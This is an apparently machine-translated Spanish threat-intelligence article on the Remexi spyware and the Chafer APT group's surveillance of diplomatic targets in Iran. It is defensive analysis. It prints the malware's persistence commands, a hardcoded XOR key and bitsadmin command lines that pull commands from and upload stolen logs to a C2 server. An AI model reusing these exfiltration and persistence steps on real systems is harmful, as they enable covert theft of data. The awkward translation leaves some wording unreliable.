Chafer utiliza el malware Remexi para monitorear las agencias diplomáticas relevantes de Irán
Resumen
En el otoño de 2018, los investigadores de Kaspersky analizaron las actividades de vigilancia de las agencias diplomáticas iraníes. El atacante usa una versión actualizada de Remexi para lanzar un ataque. Desde la distribución de la víctima, debe ser una actividad de monitoreo de la red doméstica. El malware está relacionado con la organización APT llamada Chafer.
El malware puede robar datos, como entradas de teclado, capturas de pantalla, cookies relacionadas con el navegador, historial y más. Los atacantes dependen en gran medida de la tecnología de Microsoft tanto en el cliente como en el servidor: los troyanos usan herramientas estándar de Windows como el bitadmin.exe del Servicio de Transferencia Inteligente de Microsoft (BITS) para recibir comandos y robar datos. El C2 utilizado por el atacante se basa en IIS y utiliza la tecnología .asp para manipular la solicitud HTTP de la víctima.
Los desarrolladores de Remexi utilizan el lenguaje C y los compiladores GCC del entorno Windows MinGW para desarrollar. El atacante utiliza el IDE de Qt Creator en un entorno de Windows. El malware también utiliza una variedad de mecanismos residentes, como tareas programadas, Userinit y un registro que ejecuta la sección HKLM. Diferentes muestras también utilizan encriptación XOR y RC4 y diferentes claves largas. Salamati se utiliza en claves aleatorias y es saludable en persa.
El malware detectado por los productos de seguridad de Kaspersky es Trojan.Win32.Remexi y Trojan.Win32.Agent. Este artículo se basa en un informe de análisis de noviembre de 2018.
Analisis tecnico
La herramienta principal utilizada por los investigadores para analizar las actividades de ataque es una versión actualizada del malware Remexi. El último tiempo de compilación del módulo es marzo de 2018. El desarrollador está utilizando el compilador GCC de Windows en el entorno de MinGW.
En el binario, el compilador deja pistas sobre el nombre del módulo del archivo fuente C, incluidos operation_reg.c, thread_command.c y thread_upload.c. El malware contiene muchos subprocesos de trabajo que realizan diferentes tareas, incluido el análisis de comandos C2 y el robo de datos. Remexi utiliza el mecanismo del Servicio de transferencia inteligente en segundo plano (BITS) de Microsoft para comunicarse con C2 a través de HTTP.
Propagación de la reproducción
Actualmente no hay evidencia clara de cómo se está difundiendo el malware Remexi. Vale la pena mencionar que los investigadores encontraron la relación entre la ejecución del módulo principal de Remexi y el script de AutoIt compilado en PE, que los investigadores creen que es el malware lanzado por el PE. El liberador utiliza FTP y credenciales codificadas para recibir la carga útil. En el momento del análisis, FTP ya no era accesible y no podía analizarse más.
Característica de malware
Remexi tiene muchas características que le permiten recopilar información del teclado, capturas de pantalla, robo de credenciales, inicio de sesión y el historial del navegador, y ejecutar código remoto. Los datos de la víctima se cifran cifrando el XOR que contiene la CLAVE codificada y el RC4 con la contraseña predefinida.
Remexi contiene varias parentalidades diferentes, incluido el descifrado de la configuración, el análisis y diferentes subprocesos de supervisión y funciones dependientes. Los desarrolladores de Remexi parecen confiar en las herramientas legítimas de Microsoft, como se muestra en la tabla a continuación.
Residente
El módulo residente se basa en la tarea programada y el registro del sistema, y los diferentes mecanismos de versión del sistema operativo son diferentes. En la versión anterior del sistema operativo Windows, el módulo principal events.exe ejecuta el script de ejemplo de Microsoft XPTask.vbs editado para crear tareas programadas semanales. Para la nueva versión del sistema operativo, events.exe creará task.xml:
Luego use el siguiente comando para crear una tarea programada de Windows:
Schtasks.exe / create / TN \ "Events \\ CacheTask_ <user_name_here>" / XML \ "<event_cache_dir_path> t / F"
En el nivel de registro del sistema, el módulo completa la residencia agregando el siguiente registro:
HKLM \ Software \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon \ Userinit
Comando
Todos los comandos de C2 se guardan primero en el archivo adjunto y luego se guardan en el registro del sistema. Hay hilos separados que descifran y ejecutan los archivos en el registro. El comando y la descripción son los siguientes:
· Búsqueda busca archivos relacionados
· La búsqueda y carga encripta y agrega el archivo correspondiente al directorio de carga del nombre dado
· Uploadfile cifra y agrega la ruta mencionada al directorio de carga del nombre dado
· Uploadfolder encripta y agrega el directorio mencionado al directorio de carga del nombre dado
· Shellexecute ejecuta el comando recibido con cmd.exe
· Wmic ejecuta el comando recibido con wmic.exe
· SendIEPass cifra y agrega todos los datos recopilados al archivo que se cargará en C2
· Desinstala archivos eliminados, directorios y tareas BITS
Cifrado
Para descifrar los datos de configuración, el malware usa una clave de 25 caracteres para el cifrado XOR, y diferentes muestras usan una clave diferente waEHleblxiQjoxFJQaIMLdHKz. El cifrado de archivos RC4 se basa en Windows 32 CryptoAPI.
Configuración
Config.ini es un archivo en el que el malware guarda los datos de configuración cifrados. Contiene los siguientes campos diferentes:
Módulo principal (events.exe)
Después de comprobar que el malware está instalado, el módulo principal extrae HCK.cab utilizando la herramienta estándar Microsoft expand.exe y los siguientes parámetros:
Expand.exe -r \ "<ruta completa a HCK.cab> \" -f: * \ "<event_cache_dir_path> \\\"
La clave XOR codificada de 25 bytes se usa para descifrar el archivo config.ini, y la clave XOR para cada muestra es diferente. A continuación, establezca el gancho para las teclas de control del teclado y el mouse () y MouseHookProc ():
ID de la descripción del hilo
1 Use la herramienta bitsadmin.exe para obtener comandos de C2 y guardarlos como registro de archivos y sistemas
2 utilizan RC4 y claves codificadas para descifrar comandos del registro y ejecutar
3 Mueva la captura de pantalla del portapapeles al subdirectorio \ Cache005, y mueva el texto Unicode del portapapeles a log.txt y XOR con la tecla «salamati»
4 Mueva la captura de pantalla al subdirectorio \ Cache005 con las frecuencias captureScreenTimeOut y captureScreenTimeOut
5 Compruebe la conexión de red, descifre y envíe los registros recopilados
6 Desenganche el mouse y el teclado y elimine la tarea bitsadmin
7 Compruebe si el tamaño del directorio de trabajo del malware supera el valor límite
8 Recopile las credenciales de las víctimas, el caché del sitio web visitado, los datos de inicio de sesión de Chrome descifrados y la base de datos de Firefox con cookies, claves, descargas, etc.
El malware usa el siguiente comando para recibir datos de C2:
Bitsadmin.exe / TRANSFER HelpCenterDownload / DOWNLOAD / PRIORITY normal <server> <file> Http: // <server_config> /asp.asp?ui= <host_name> nrg- <adapter_info> - <user_name>
Módulo de registro de actividad Splitter.exe
Este módulo es llamado por el hilo principal para obtener una captura de pantalla de Windows.
Además de aplicar el módulo auxiliar en forma de una biblioteca de enlaces dinámicos y las funciones de salida correspondientes, el desarrollador decidió usar events.exe y los siguientes parámetros para abrir una aplicación independiente:
Robo de datos
El robo de datos se realiza a través de la herramienta bitsadmin.exe. El mecanismo BITS está disponible desde Windows XP a la versión actual de Windows 10 para crear tareas de descarga y carga, principalmente para actualizar el sistema operativo. El siguiente comando se usa para robar datos de la víctima:
Bitsadmin.exe / TRANSFER HelpCenterUpload / UPLOAD / PRIORITY normal "<control_server> / YP01_ <victim_fingerprint> _ <log_file_name>" "<log_file_name>"
Víctima
Según el análisis de usuario objetivo de la variante Remexi, se encontró que la dirección IP de Irán es principalmente. Algunas de ellas son entidades diplomáticas situadas en Irán.
Atribución
Los investigadores analizaron el malware Remexi y se relacionaron con la organización APT Chafer. Una de las claves cifradas es salamati, la palabra es saludable en persa. El análisis de la evidencia relacionada con los autores de malware encontró que la ruta .pdb contenía un nombre de usuario de Windows Mohamadreza New. En el sitio web del FBI, se busca a dos criminales iraníes, Mohammad Reza, pero este también puede ser un nombre común o incluso un logotipo equivocado.
Conclusión
La organización Chafer APT ha estado activa desde 2015. Basándose en las marcas de tiempo compiladas y el análisis de registro C2, los investigadores creen que el tiempo de actividad de la organización puede ser anterior. En general, el principal objetivo de Chafer es Irán, aunque también puede incluir otros países en el Medio Oriente.
